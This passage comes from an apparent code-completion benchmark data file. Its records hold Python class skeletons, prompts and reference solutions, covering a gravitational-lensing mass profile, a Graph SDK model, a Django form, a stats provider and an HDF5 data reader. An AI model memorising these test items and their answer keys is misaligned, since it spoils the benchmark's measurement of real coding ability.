_hypergeometric_series(ellip_angle, slope, axis_ratio):\n \"\"\"Calculate the hypergeometric series required for the derivative. Args: ellip_angle: The elliptical angles at which to evaluate the series. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio the major and minor axis of ellipticity. 
Returns: The hypergeometric series sum for each angle.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n z = jnp.exp(-1j * angle) * (x - center_x + (y - center_y) * 1j)\n scale_length = theta_e * jnp.sqrt(axis_ratio)\n complex_derivative = EPL._complex_derivative(z.real, z.imag, scale_length, axis_ratio, slope) * jnp.exp(1j * angle)\n return (complex_derivative.real, complex_derivative.imag)\n<|end_body_0|>\n\n<|body_start_1|>\n ellip_vector = x * axis_ratio + 1j * y\n ellip_radius = jnp.abs(ellip_vector)\n ellip_angle = jnp.angle(ellip_vector)\n omega = EPL._hypergeometric_series(ellip_angle, slope, axis_ratio)\n return 2 * scale_length / (1 + axis_ratio) * jnp.nan_to_num((scale_length / ellip_radius) ** (slope - 2), copy=False) * omega\n<|end_body_1|>\n\n<|body_start_2|>\n flattening = (1 - axis_ratio) / (1 + axis_ratio)\n omegas = jnp.zeros_like(ellip_angle)\n four_n = 1 * jnp.exp(1j * ellip_angle)\n omegas += four_n\n four_factor = -flattening * jnp.exp(2j * ellip_angle)\n for n in range(1, 200):\n four_n *= (2 * n - (3 - slope)) / (2 * n + (3 - slope)) * four_factor\n omegas += four_n\n return omegas\n<|end_body_2|>\n", "revision_id": "5573d9c5822f4e866b6692769963ae819cb3f10d", "skeleton": "<|skeleton|>\nclass EPL:\n \"\"\"Elliptical Power Law mass profile. Elliptical Power Law mass profile functions, with calculation following those described in Tessore & Metcalf (2015) and implementation closely following the EPL_numba class in Lenstronomy.\"\"\"\n\n def derivatives(x, y, theta_e, slope, axis_ratio, angle, center_x, center_y):\n \"\"\"Calculate the derivative of the potential for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. theta_e: Einstein radius of the EPL profile. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio of the major and minor axis of ellipticity. angle: Clockwise angle of orientation of major axis. center_x: X-coordinate center of the EPL profile. center_y: Y-coordinate cetner of the EPL profile. Returns: X- and y-component of the derivatives.\"\"\"\n <|body_0|>\n\n def _complex_derivative(x, y, scale_length, axis_ratio, slope):\n \"\"\"Calculate the complex derivative for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. scale_length: Scale length of the EPL mass profile (related to Einstein Radius by axis ratio). axis_ratio: Axis ratio of the major and minor axis of ellipticity. slope: Power-law slope of the EPL profile. Returns: Complex derivative at each (x,y) coordinate pair.\"\"\"\n <|body_1|>\n\n def _hypergeometric_series(ellip_angle, slope, axis_ratio):\n \"\"\"Calculate the hypergeometric series required for the derivative. Args: ellip_angle: The elliptical angles at which to evaluate the series. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio the major and minor axis of ellipticity. Returns: The hypergeometric series sum for each angle.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class EPL:\n \"\"\"Elliptical Power Law mass profile. 
Elliptical Power Law mass profile functions, with calculation following those described in Tessore & Metcalf (2015) and implementation closely following the EPL_numba class in Lenstronomy.\"\"\"\n\n def derivatives(x, y, theta_e, slope, axis_ratio, angle, center_x, center_y):\n \"\"\"Calculate the derivative of the potential for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. theta_e: Einstein radius of the EPL profile. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio of the major and minor axis of ellipticity. angle: Clockwise angle of orientation of major axis. center_x: X-coordinate center of the EPL profile. center_y: Y-coordinate cetner of the EPL profile. Returns: X- and y-component of the derivatives.\"\"\"\n z = jnp.exp(-1j * angle) * (x - center_x + (y - center_y) * 1j)\n scale_length = theta_e * jnp.sqrt(axis_ratio)\n complex_derivative = EPL._complex_derivative(z.real, z.imag, scale_length, axis_ratio, slope) * jnp.exp(1j * angle)\n return (complex_derivative.real, complex_derivative.imag)\n\n def _complex_derivative(x, y, scale_length, axis_ratio, slope):\n \"\"\"Calculate the complex derivative for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. scale_length: Scale length of the EPL mass profile (related to Einstein Radius by axis ratio). axis_ratio: Axis ratio of the major and minor axis of ellipticity. slope: Power-law slope of the EPL profile. Returns: Complex derivative at each (x,y) coordinate pair.\"\"\"\n ellip_vector = x * axis_ratio + 1j * y\n ellip_radius = jnp.abs(ellip_vector)\n ellip_angle = jnp.angle(ellip_vector)\n omega = EPL._hypergeometric_series(ellip_angle, slope, axis_ratio)\n return 2 * scale_length / (1 + axis_ratio) * jnp.nan_to_num((scale_length / ellip_radius) ** (slope - 2), copy=False) * omega\n\n def _hypergeometric_series(ellip_angle, slope, axis_ratio):\n \"\"\"Calculate the hypergeometric series required for the derivative. Args: ellip_angle: The elliptical angles at which to evaluate the series. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio the major and minor axis of ellipticity. 
Returns: The hypergeometric series sum for each angle.\"\"\"\n flattening = (1 - axis_ratio) / (1 + axis_ratio)\n omegas = jnp.zeros_like(ellip_angle)\n four_n = 1 * jnp.exp(1j * ellip_angle)\n omegas += four_n\n four_factor = -flattening * jnp.exp(2j * ellip_angle)\n for n in range(1, 200):\n four_n *= (2 * n - (3 - slope)) / (2 * n + (3 - slope)) * four_factor\n omegas += four_n\n return omegas\n", "source": "the_stack_v2_python_sparse", "source_path": "jaxstronomy/lens_models.py", "source_repo": "Jimmy-INL/google-research", "split": "test", "star_events_count": 1} {"blob_id": "db34fbd364648cb4e292bd5102c6d58ee6b52fc0", "bodies": ["if not parse_node:\n raise TypeError('parse_node cannot be null.')\nreturn RiskyUserHistoryItem()", "from .risk_user_activity import RiskUserActivity\nfrom .risky_user import RiskyUser\nfrom .risk_user_activity import RiskUserActivity\nfrom .risky_user import RiskyUser\nfields: Dict[str, Callable[[Any], None]] = {'activity': lambda n: setattr(self, 'activity', n.get_object_value(RiskUserActivity)), 'initiatedBy': lambda n: setattr(self, 'initiated_by', n.get_str_value()), 'userId': lambda n: setattr(self, 'user_id', n.get_str_value())}\nsuper_fields = super().get_field_deserializers()\nfields.update(super_fields)\nreturn fields", "if not writer:\n raise TypeError('writer cannot be null.')\nsuper().serialize(writer)\nwriter.write_object_value('activity', self.activity)\nwriter.write_str_value('initiatedBy', self.initiated_by)\nwriter.write_str_value('userId', self.user_id)"], "bodies_text": "<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return RiskyUserHistoryItem()\n<|end_body_0|>\n\n<|body_start_1|>\n from .risk_user_activity import RiskUserActivity\n from .risky_user import RiskyUser\n from .risk_user_activity import RiskUserActivity\n from .risky_user import RiskyUser\n fields: Dict[str, Callable[[Any], None]] = {'activity': lambda n: setattr(self, 'activity', n.get_object_value(RiskUserActivity)), 'initiatedBy': lambda n: setattr(self, 'initiated_by', n.get_str_value()), 'userId': lambda n: setattr(self, 'user_id', n.get_str_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_object_value('activity', self.activity)\n writer.write_str_value('initiatedBy', self.initiated_by)\n writer.write_str_value('userId', self.user_id)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "RiskyUserHistoryItem", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RiskyUserHistoryItem:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> RiskyUserHistoryItem:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: RiskyUserHistoryItem\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n 
raise TypeError('parse_node cannot be null.')\n return RiskyUserHistoryItem()\n<|end_body_0|>\n\n<|body_start_1|>\n from .risk_user_activity import RiskUserActivity\n from .risky_user import RiskyUser\n from .risk_user_activity import RiskUserActivity\n from .risky_user import RiskyUser\n fields: Dict[str, Callable[[Any], None]] = {'activity': lambda n: setattr(self, 'activity', n.get_object_value(RiskUserActivity)), 'initiatedBy': lambda n: setattr(self, 'initiated_by', n.get_str_value()), 'userId': lambda n: setattr(self, 'user_id', n.get_str_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_object_value('activity', self.activity)\n writer.write_str_value('initiatedBy', self.initiated_by)\n writer.write_str_value('userId', self.user_id)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000451", "length_bytes": 2658, "license_type": "permissive", "methods": [{"docstring": "Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: RiskyUserHistoryItem", "name": "create_from_discriminator_value", "signature": "def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> RiskyUserHistoryItem"}, {"docstring": "The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]", "name": "get_field_deserializers", "signature": "def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]"}, {"docstring": "Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "name": "serialize", "signature": "def serialize(self, writer: SerializationWriter) -> None"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005766", "prompt": "Implement the Python class `RiskyUserHistoryItem` described below.\n\nClass description:\nImplement the RiskyUserHistoryItem class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> RiskyUserHistoryItem: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: RiskyUserHistoryItem\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "prompted_full_text": "Implement the Python class `RiskyUserHistoryItem` described below.\n\nClass description:\nImplement the RiskyUserHistoryItem class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> RiskyUserHistoryItem: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: RiskyUserHistoryItem\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: 
SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model\n\n<|skeleton|>\nclass RiskyUserHistoryItem:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> RiskyUserHistoryItem:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: RiskyUserHistoryItem\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return RiskyUserHistoryItem()\n<|end_body_0|>\n\n<|body_start_1|>\n from .risk_user_activity import RiskUserActivity\n from .risky_user import RiskyUser\n from .risk_user_activity import RiskUserActivity\n from .risky_user import RiskyUser\n fields: Dict[str, Callable[[Any], None]] = {'activity': lambda n: setattr(self, 'activity', n.get_object_value(RiskUserActivity)), 'initiatedBy': lambda n: setattr(self, 'initiated_by', n.get_str_value()), 'userId': lambda n: setattr(self, 'user_id', n.get_str_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_object_value('activity', self.activity)\n writer.write_str_value('initiatedBy', self.initiated_by)\n writer.write_str_value('userId', self.user_id)\n<|end_body_2|>\n", "revision_id": "27de7ccbe688d7614b2f6bde0fdbcda4bc5cc949", "skeleton": "<|skeleton|>\nclass RiskyUserHistoryItem:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> RiskyUserHistoryItem:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: RiskyUserHistoryItem\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RiskyUserHistoryItem:\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> RiskyUserHistoryItem:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: RiskyUserHistoryItem\"\"\"\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return RiskyUserHistoryItem()\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, 
Callable[[ParseNode], None]]\"\"\"\n from .risk_user_activity import RiskUserActivity\n from .risky_user import RiskyUser\n fields: Dict[str, Callable[[Any], None]] = {'activity': lambda n: setattr(self, 'activity', n.get_object_value(RiskUserActivity)), 'initiatedBy': lambda n: setattr(self, 'initiated_by', n.get_str_value()), 'userId': lambda n: setattr(self, 'user_id', n.get_str_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information of the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_object_value('activity', self.activity)\n writer.write_str_value('initiatedBy', self.initiated_by)\n writer.write_str_value('userId', self.user_id)\n", "source": "the_stack_v2_python_sparse", "source_path": "msgraph/generated/models/risky_user_history_item.py", "source_repo": "microsoftgraph/msgraph-sdk-python", "split": "test", "star_events_count": 135} {"blob_id": "153f267eaedd42cb199f155c8c0ddb694ae1f4a3", "bodies": ["logger.debug('Start clean data in ResetPasswordForm.')\nemail = self.cleaned_data.get('email')\nself.validator_all(email)\nlogger.debug('Exit clean data in ResetPasswordForm.')\nreturn super(ResetPasswordForm, self).clean(*args, **kwargs)", "logger.debug('Start validations in ResetPasswordForm.')\nvalidator = UserValidator()\nvalidator.validator_email_in_reset_password(email)\nlogger.debug('Exit validations in ResetPasswordForm.')"], "bodies_text": "<|body_start_0|>\n logger.debug('Start clean data in ResetPasswordForm.')\n email = self.cleaned_data.get('email')\n self.validator_all(email)\n logger.debug('Exit clean data in ResetPasswordForm.')\n return super(ResetPasswordForm, self).clean(*args, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n logger.debug('Start validations in ResetPasswordForm.')\n validator = UserValidator()\n validator.validator_email_in_reset_password(email)\n logger.debug('Exit validations in ResetPasswordForm.')\n<|end_body_1|>\n", "class_docstring": "Form to reset password User", "class_name": "ResetPasswordForm", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ResetPasswordForm:\n \"\"\"Form to reset password User\"\"\"\n\n def clean(self, *args, **kwargs):\n \"\"\"Get patient fields.\"\"\"\n <|body_0|>\n\n def validator_all(self, email):\n \"\"\"Checks validator in all fields.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n logger.debug('Start clean data in ResetPasswordForm.')\n email = self.cleaned_data.get('email')\n self.validator_all(email)\n logger.debug('Exit clean data in ResetPasswordForm.')\n return super(ResetPasswordForm, self).clean(*args, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n logger.debug('Start validations in ResetPasswordForm.')\n validator = UserValidator()\n validator.validator_email_in_reset_password(email)\n logger.debug('Exit validations in ResetPasswordForm.')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000452", "length_bytes": 1291, "license_type": "permissive", "methods": [{"docstring": "Get patient fields.", "name": "clean", "signature": "def clean(self, *args, **kwargs)"}, {"docstring": "Checks validator in all fields.", "name": "validator_all", "signature": "def 
validator_all(self, email)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000920", "prompt": "Implement the Python class `ResetPasswordForm` described below.\n\nClass description:\nForm to reset password User\n\nMethod signatures and docstrings:\n- def clean(self, *args, **kwargs): Get patient fields.\n- def validator_all(self, email): Checks validator in all fields.", "prompted_full_text": "Implement the Python class `ResetPasswordForm` described below.\n\nClass description:\nForm to reset password User\n\nMethod signatures and docstrings:\n- def clean(self, *args, **kwargs): Get patient fields.\n- def validator_all(self, email): Checks validator in all fields.\n\n<|skeleton|>\nclass ResetPasswordForm:\n \"\"\"Form to reset password User\"\"\"\n\n def clean(self, *args, **kwargs):\n \"\"\"Get patient fields.\"\"\"\n <|body_0|>\n\n def validator_all(self, email):\n \"\"\"Checks validator in all fields.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n logger.debug('Start clean data in ResetPasswordForm.')\n email = self.cleaned_data.get('email')\n self.validator_all(email)\n logger.debug('Exit clean data in ResetPasswordForm.')\n return super(ResetPasswordForm, self).clean(*args, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n logger.debug('Start validations in ResetPasswordForm.')\n validator = UserValidator()\n validator.validator_email_in_reset_password(email)\n logger.debug('Exit validations in ResetPasswordForm.')\n<|end_body_1|>\n", "revision_id": "5387eb80dfb354e948abe64f7d8bbe087fc4f136", "skeleton": "<|skeleton|>\nclass ResetPasswordForm:\n \"\"\"Form to reset password User\"\"\"\n\n def clean(self, *args, **kwargs):\n \"\"\"Get patient fields.\"\"\"\n <|body_0|>\n\n def validator_all(self, email):\n \"\"\"Checks validator in all fields.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ResetPasswordForm:\n \"\"\"Form to reset password User\"\"\"\n\n def clean(self, *args, **kwargs):\n \"\"\"Get patient fields.\"\"\"\n logger.debug('Start clean data in ResetPasswordForm.')\n email = self.cleaned_data.get('email')\n self.validator_all(email)\n logger.debug('Exit clean data in ResetPasswordForm.')\n return super(ResetPasswordForm, self).clean(*args, **kwargs)\n\n def validator_all(self, email):\n \"\"\"Checks validator in all fields.\"\"\"\n logger.debug('Start validations in ResetPasswordForm.')\n validator = UserValidator()\n validator.validator_email_in_reset_password(email)\n logger.debug('Exit validations in ResetPasswordForm.')\n", "source": "the_stack_v2_python_sparse", "source_path": "medical_prescription/user/forms/resetpasswordform.py", "source_repo": "ristovao/2017.2-Receituario-Medico", "split": "test", "star_events_count": 0} {"blob_id": "8088bc5b2311607af3c9946eb29481f6881a7730", "bodies": ["if not provider:\n raise ValueError('Stats provider input must not be empty.')\nself._provider = provider\nself._methods = methods\nself._ignore_missing = ignore_missing", "instance = self._provider.provide(config, injector)\nif self._methods:\n collector: Collector = injector.inject_or(Collector)\n if collector:\n collector.wrap(instance, self._methods, ignore_missing=self._ignore_missing)\nreturn instance"], "bodies_text": "<|body_start_0|>\n if not provider:\n raise ValueError('Stats provider input must not be empty.')\n self._provider = provider\n self._methods = methods\n self._ignore_missing = 
ignore_missing\n<|end_body_0|>\n\n<|body_start_1|>\n instance = self._provider.provide(config, injector)\n if self._methods:\n collector: Collector = injector.inject_or(Collector)\n if collector:\n collector.wrap(instance, self._methods, ignore_missing=self._ignore_missing)\n return instance\n<|end_body_1|>\n", "class_docstring": "Add statistics to the results of another provider.", "class_name": "StatsProvider", "detected_licenses": ["LicenseRef-scancode-dco-1.1", "Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass StatsProvider:\n \"\"\"Add statistics to the results of another provider.\"\"\"\n\n def __init__(self, provider: BaseProvider, methods: Sequence[str], *, ignore_missing: bool=True):\n \"\"\"Initialize the statistics provider instance.\"\"\"\n <|body_0|>\n\n def provide(self, config: BaseSettings, injector: BaseInjector):\n \"\"\"Provide the object instance given a config and injector.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not provider:\n raise ValueError('Stats provider input must not be empty.')\n self._provider = provider\n self._methods = methods\n self._ignore_missing = ignore_missing\n<|end_body_0|>\n\n<|body_start_1|>\n instance = self._provider.provide(config, injector)\n if self._methods:\n collector: Collector = injector.inject_or(Collector)\n if collector:\n collector.wrap(instance, self._methods, ignore_missing=self._ignore_missing)\n return instance\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000453", "length_bytes": 4857, "license_type": "permissive", "methods": [{"docstring": "Initialize the statistics provider instance.", "name": "__init__", "signature": "def __init__(self, provider: BaseProvider, methods: Sequence[str], *, ignore_missing: bool=True)"}, {"docstring": "Provide the object instance given a config and injector.", "name": "provide", "signature": "def provide(self, config: BaseSettings, injector: BaseInjector)"}], "n_methods": 2, "prompt": "Implement the Python class `StatsProvider` described below.\n\nClass description:\nAdd statistics to the results of another provider.\n\nMethod signatures and docstrings:\n- def __init__(self, provider: BaseProvider, methods: Sequence[str], *, ignore_missing: bool=True): Initialize the statistics provider instance.\n- def provide(self, config: BaseSettings, injector: BaseInjector): Provide the object instance given a config and injector.", "prompted_full_text": "Implement the Python class `StatsProvider` described below.\n\nClass description:\nAdd statistics to the results of another provider.\n\nMethod signatures and docstrings:\n- def __init__(self, provider: BaseProvider, methods: Sequence[str], *, ignore_missing: bool=True): Initialize the statistics provider instance.\n- def provide(self, config: BaseSettings, injector: BaseInjector): Provide the object instance given a config and injector.\n\n<|skeleton|>\nclass StatsProvider:\n \"\"\"Add statistics to the results of another provider.\"\"\"\n\n def __init__(self, provider: BaseProvider, methods: Sequence[str], *, ignore_missing: bool=True):\n \"\"\"Initialize the statistics provider instance.\"\"\"\n <|body_0|>\n\n def provide(self, config: BaseSettings, injector: BaseInjector):\n \"\"\"Provide the object instance given a config and injector.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not provider:\n raise ValueError('Stats provider input must not be empty.')\n self._provider = provider\n self._methods = methods\n self._ignore_missing = 
ignore_missing\n<|end_body_0|>\n\n<|body_start_1|>\n instance = self._provider.provide(config, injector)\n if self._methods:\n collector: Collector = injector.inject_or(Collector)\n if collector:\n collector.wrap(instance, self._methods, ignore_missing=self._ignore_missing)\n return instance\n<|end_body_1|>\n", "revision_id": "39cac36d8937ce84a9307ce100aaefb8bc05ec04", "skeleton": "<|skeleton|>\nclass StatsProvider:\n \"\"\"Add statistics to the results of another provider.\"\"\"\n\n def __init__(self, provider: BaseProvider, methods: Sequence[str], *, ignore_missing: bool=True):\n \"\"\"Initialize the statistics provider instance.\"\"\"\n <|body_0|>\n\n def provide(self, config: BaseSettings, injector: BaseInjector):\n \"\"\"Provide the object instance given a config and injector.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class StatsProvider:\n \"\"\"Add statistics to the results of another provider.\"\"\"\n\n def __init__(self, provider: BaseProvider, methods: Sequence[str], *, ignore_missing: bool=True):\n \"\"\"Initialize the statistics provider instance.\"\"\"\n if not provider:\n raise ValueError('Stats provider input must not be empty.')\n self._provider = provider\n self._methods = methods\n self._ignore_missing = ignore_missing\n\n def provide(self, config: BaseSettings, injector: BaseInjector):\n \"\"\"Provide the object instance given a config and injector.\"\"\"\n instance = self._provider.provide(config, injector)\n if self._methods:\n collector: Collector = injector.inject_or(Collector)\n if collector:\n collector.wrap(instance, self._methods, ignore_missing=self._ignore_missing)\n return instance\n", "source": "the_stack_v2_python_sparse", "source_path": "aries_cloudagent/config/provider.py", "source_repo": "hyperledger/aries-cloudagent-python", "split": "test", "star_events_count": 370} {"blob_id": "ccee0d533b8ff28049f232b8de54df919b3f2c2c", "bodies": ["BaseIO.__init__(self)\nself._filename = filename\nself._path, file = os.path.split(filename)\nself._kwik = h5py.File(filename, 'r')\nself._dataset = dataset\ntry:\n rawfile = self._kwik['recordings'][str(self._dataset)]['raw'].attrs['hdf5_path']\n rawfile = rawfile.split('/')[0]\nexcept:\n rawfile = file.split('.')[0] + '_100.raw.kwd'\nself._kwd = h5py.File(self._path + os.sep + rawfile, 'r')\nself._attrs = {}\nself._attrs['kwik'] = self._kwik['recordings'][str(self._dataset)].attrs\nself._attrs['kwd'] = self._kwd['recordings'][str(self._dataset)].attrs\nself._attrs['shape'] = self._kwd['recordings'][str(self._dataset)]['data'].shape\ntry:\n self._attrs['app_data'] = self._kwd['recordings'][str(self._dataset)]['application_data'].attrs\nexcept:\n self._attrs['app_data'] = False", "blk = Block()\nif cascade:\n seg = Segment(file_origin=self._filename)\n blk.segments += [seg]\n if channel_index:\n if type(channel_index) is int:\n channel_index = [channel_index]\n if type(channel_index) is list:\n channel_index = np.array(channel_index)\n else:\n channel_index = np.arange(0, self._attrs['shape'][1])\n chx = ChannelIndex(name='all channels', index=channel_index)\n blk.channel_indexes.append(chx)\n ana = self.read_analogsignal(channel_index=channel_index, lazy=lazy, cascade=cascade)\n ana.channel_index = chx\n seg.duration = self._attrs['shape'][0] / self._attrs['kwik']['sample_rate'] * pq.s\nblk.create_many_to_one_relationship()\nreturn blk", "if self._attrs['app_data']:\n bit_volts = 
self._attrs['app_data']['channel_bit_volts']\n sig_unit = 'uV'\nelse:\n bit_volts = np.ones(self._attrs['shape'][1])\n sig_unit = 'bit'\nif lazy:\n anasig = AnalogSignal([], units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n anasig.lazy_shape = self._attrs['shape'][0]\nelse:\n data = self._kwd['recordings'][str(self._dataset)]['data'].value[:, channel_index]\n data = data * bit_volts[channel_index]\n anasig = AnalogSignal(data, units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n data = []\nanasig.annotate(info='raw traces')\nreturn anasig"], "bodies_text": "<|body_start_0|>\n BaseIO.__init__(self)\n self._filename = filename\n self._path, file = os.path.split(filename)\n self._kwik = h5py.File(filename, 'r')\n self._dataset = dataset\n try:\n rawfile = self._kwik['recordings'][str(self._dataset)]['raw'].attrs['hdf5_path']\n rawfile = rawfile.split('/')[0]\n except:\n rawfile = file.split('.')[0] + '_100.raw.kwd'\n self._kwd = h5py.File(self._path + os.sep + rawfile, 'r')\n self._attrs = {}\n self._attrs['kwik'] = self._kwik['recordings'][str(self._dataset)].attrs\n self._attrs['kwd'] = self._kwd['recordings'][str(self._dataset)].attrs\n self._attrs['shape'] = self._kwd['recordings'][str(self._dataset)]['data'].shape\n try:\n self._attrs['app_data'] = self._kwd['recordings'][str(self._dataset)]['application_data'].attrs\n except:\n self._attrs['app_data'] = False\n<|end_body_0|>\n\n<|body_start_1|>\n blk = Block()\n if cascade:\n seg = Segment(file_origin=self._filename)\n blk.segments += [seg]\n if channel_index:\n if type(channel_index) is int:\n channel_index = [channel_index]\n if type(channel_index) is list:\n channel_index = np.array(channel_index)\n else:\n channel_index = np.arange(0, self._attrs['shape'][1])\n chx = ChannelIndex(name='all channels', index=channel_index)\n blk.channel_indexes.append(chx)\n ana = self.read_analogsignal(channel_index=channel_index, lazy=lazy, cascade=cascade)\n ana.channel_index = chx\n seg.duration = self._attrs['shape'][0] / self._attrs['kwik']['sample_rate'] * pq.s\n blk.create_many_to_one_relationship()\n return blk\n<|end_body_1|>\n\n<|body_start_2|>\n if self._attrs['app_data']:\n bit_volts = self._attrs['app_data']['channel_bit_volts']\n sig_unit = 'uV'\n else:\n bit_volts = np.ones(self._attrs['shape'][1])\n sig_unit = 'bit'\n if lazy:\n anasig = AnalogSignal([], units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n anasig.lazy_shape = self._attrs['shape'][0]\n else:\n data = self._kwd['recordings'][str(self._dataset)]['data'].value[:, channel_index]\n data = data * bit_volts[channel_index]\n anasig = AnalogSignal(data, units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n data = []\n anasig.annotate(info='raw traces')\n return anasig\n<|end_body_2|>\n", "class_docstring": "Class for 